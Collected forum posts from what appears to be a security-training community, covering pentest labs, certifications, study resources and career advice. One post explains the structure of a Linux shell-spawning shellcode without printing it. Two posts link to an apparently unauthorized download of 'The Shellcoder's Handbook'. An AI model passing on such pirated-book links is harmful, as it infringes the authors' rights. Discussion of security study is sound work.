Hi All,

If you wish to do some simulation based hacking attempts, please visit de-ice.net and download the pentest disks.

Please note that you have to register before downloading anything from this site.

For more info http://de-ice.net/index.php?name=PNphpBB2&file=index&c=10


Happy hacking!!!

Hi,

I suggest you to go for OSCP.There is a wonderful review written by blackazarro..
http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,1152.msg3741/#msg3741

Hope this helps.

Hi,

I would like you to introduce to a new startup company in India who does On Demand penetration testing.

Have a look at http://www.ivizindia.com/iviz/

The above hex encoded string is the normal "shellcode" to get a shell. Initial part is filled with "nops" so even if the eip falls anywhere near should reach at the shellcode.
The behaviour of this "sc" is to first set a group id "setgid", then to set session id "setsid". Towards the end it tries to call the "execve" to execute /bin/sh..

Anyway tis was the postmortem report of the small snippet you posted. The last hex byte was missing which should be "68"

This is not a good shellcode..It needs some minor tweakings for successful exploitation and it is not affected to a windows machine [because it is a linux shellcode]

Had some fun in reverse engineering that stuff!!!

If you are really motivated to be in the security field, then I suggest you to read fyodor's interview published in slashdot. Refer 4th question and his answer to it. If his answer really motivates you to be "THE ONE", then no one can stop you.

http://interviews.slashdot.org/article.pl?sid=03/05/30/1148235&startat=&threshold=4&mode=nocomment&commentsort=3&op=Change

Happy Reading!!!

I agree with what dean has posted.

In every job, there is a risk. And success is with one who is going to take that risk. A penetration test engineer might be having the greater risk as he is involved in identifying the weakness of his client's network. But I suggest to make his role on the safer side by mentioning discliamer's in final report and scopes. Also if you are confident in your assessment, then there is no need to worry. Keep on moving with the next assignment and get engaged for self improvement. This is a profession which requires real professionalism with utmost quality in content and clarity in the data's collected.

There is no situation like "Total Security" as every piece of code is vulnerable to bugs. After all it's a human design and it takes some time to see the vulnerabilities in wild. With the modern sophisticated and complex security produts, vulnerabilities and attack vectors would always be in it's zenith.

As Bruce Schneier said "Security is a process, not a product"!!! And human's are the weakest link to security. So wherever there is a human interaction with a security product, there is a possibility for exploitation. This is one thing all Penetration engineers should know.

"Total security" means when its totally cut off from the network :-)

Hi ChrisG,

Second edition of Shellcoder is out. Checkout my previous post. It has a link to pdfchm.com where you can download the book.

Hi,

I would like to introduce a security suite called as "wifiway" for those who are interested in wireless audits and penetration testing. This suite does kernel patching which makes it possible for wireless packet injection from an intel wireless card (ipw3945).

For more info http://www.wifiway.org/
You can also see a video hosted at youtube www.youtube.com/watch?v=voyvusZdcn8

Happy war driving!!!

I have read the first book "Reversing: Secrets of Reverse Engineering". It is a good one. I have to check the second one.

I would also like to add another good book "The shellcoders Handbook" http://www.pdfchm.com/book/the-shellcoders-handbook-discovering-and-exploiting-security-holes-8882/

A quick google search gave me these links..Hope it would be useful for you!!!

http://www.google.co.in/search?hl=en&q=CISSP+boot+camps+India&btnG=Google+Search&meta=

Hi,

Thanks for all wonderful opinions.
The training offered by Infosec is great but it is not an apt solution for me because I am not US based and it requires travelling which is very expensive :-) for me.

Have anyone heard of online courses offered on advanced penetration testing. I have two such links CBVA (https://www.iitac.org/content/view/132/110/lang,en/) and CRCEP (https://www.iitac.org/content/view/128/110/lang,en/). These courses come from the creators behind DVL and reverse-engineering.net
I would like to here opinions regarding these course and its value!!!

Thanks ChrisG for your valuable advice.

I need to increase my knowledge level and I am looking for the next appropriate certification. I can either move for a vendor based cert or vendor neutral cert. But I am not able to make a final decision on where I should concentrate. I believe certifications wont make you technically competant, but they do give a minimum level in the job market.

I have expirience in conducting penetration tests and vulnerability assessments. This also includes web application testing. Now I am interested in a cert where it focuses on vulnerability research. Can anyone advice me to be on this track??

Hi,

i would like to add the books and tutorials I used for learning Sec+.

1. I used the Testout to learn for Security+ cert . I found it to be really good in  improving my knowledge. It also have an interactive lab where you can really understand how security is implemented in different technologies!!! (For more info, go here http://www.testout.com/securityplus/index.htm)

2. I also used Sybex book to review the contents after learning it from Testout .

3. I also attempted all possible free tests to add my confidence. Among them, I found techexams to be very useful http://www.techexams.net/co_securityplus.shtml. You can visit this during your last preperation days. A great valuable site.

Thats all.. Sec+ exam is easy if you have enough expirience in a security field.

All the best!!!

Hi All,

I would like to know more regarding certifications offered by SCP. Is it really good to take certification offered by SCP? Is this having a market value?

Thanks,